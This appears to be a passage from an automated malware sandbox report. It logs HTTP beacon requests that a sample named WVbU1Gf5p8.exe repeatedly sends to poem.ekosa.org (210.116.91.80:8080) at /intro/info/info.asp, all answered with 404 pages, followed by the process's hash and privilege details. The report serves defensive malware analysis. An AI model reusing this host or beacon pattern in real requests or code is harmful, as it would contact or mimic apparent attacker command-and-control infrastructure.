      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:51.847165108 CET666INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:51 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      95192.168.2.449868210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:52.114242077 CET668OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:52.375633955 CET671INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:51 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      96192.168.2.449869210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:52.756196976 CET691OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:53.025325060 CET1351INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:52 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      97192.168.2.449875210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:53.292113066 CET4303OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:53.554802895 CET4303INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:52 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      98192.168.2.449876210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:53.823312044 CET4304OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:54.087682962 CET4305INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:53 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      99192.168.2.449877210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:54.462141037 CET4305OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:54.720748901 CET4306INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:53 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Code Manipulations

      Statistics

      System Behavior

      Analysis Process: WVbU1Gf5p8.exe PID: 6344 Parent PID: 6040

      General

      Start time:17:54:55
      Start date:11/01/2021
      Path:C:\Users\user\Desktop\WVbU1Gf5p8.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\WVbU1Gf5p8.exe'
      Imagebase:0x1230000
      File size:51000 bytes
      MD5 hash:69F7CDE70CC22ACEB5DD32FF1DC3F685
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low

      Disassembly

      Code Analysis

      Reset < >